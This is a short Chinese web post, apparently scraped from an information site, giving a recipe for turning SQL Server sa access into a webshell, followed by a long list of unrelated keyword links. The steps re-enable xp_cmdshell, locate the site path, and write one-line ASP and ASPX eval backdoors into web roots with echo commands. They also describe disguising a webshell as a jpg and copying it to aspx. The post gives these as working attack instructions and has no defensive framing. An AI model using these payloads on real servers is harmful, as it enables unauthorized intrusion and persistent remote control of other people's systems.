sa权限获取webshell思路
发表于:2024-11-24 作者:千家信息网编辑
千家信息网最后更新 2024年11月24日,sa权限获取webshell思路1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真
千家信息网最后更新 2024年11月24日sa权限获取webshell思路
sa权限获取webshell思路
1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。
2.通过SQL Tools2.0连接数据库,执行命令,查看网站路径以及磁盘文件,获取网站的真实路径。
3.echo生成一句话后门。
4.直接获取webshell权限。
5.如果echo生成的一句话后门无法执行,可以通过查看对应网站的数据库,获取后台登陆密码,通过后台上传webshell的jpg。然后通过copy命令将jgp文件复制为aspx文件,从而获取webshell。
技巧:
1.寻找可写的文件夹,例如c:/windows/temp,以及网站的真实路劲。
2.通过echo命令生成一句话后门
echo ^<%eval request(cmd)% ^>^>d:\wwwroot\ok.asp
echo ^^>cmd.php
echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:\inetpub\wwwroot\cmd.aspx
文件
网站
权限
一句话
后门
命令
生成
后台
数据
数据库
路径
思路
分析器
可以通过
密码
技巧
文件夹
磁盘
过程
分析
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
青少年信息网络安全
公安网络安全攻防实验员具备
软件开发计划摘要
软件开发cme
软件开发区合计面积
英灵神殿怎么搭服务器
如何管理服务器上的文件
自家的服务器地址填什么
数据库系统形状分类
列举出至少四个软件开发模型
网络安全关于中班幼儿
政府五大基础数据库建设
web 服务器的响应时间
江西泰来网络技术有限公司
文化网络安全检查总结
云南软件开发费用测算
智帮互联网科技公司官网
和网络安全相关的开题报告
乡镇网络安全和信息化台账
12号染色体数据库
如何在orcal建数据库
网络安全社会效益
计算机网络技术选修课学什么
闵行区软件开发代理品牌
网络安全的漏洞可不可以避免
exe数据库提取
互联网科技发布会
数据库的对象是
服务器里的python怎么用
关于我国网络安全
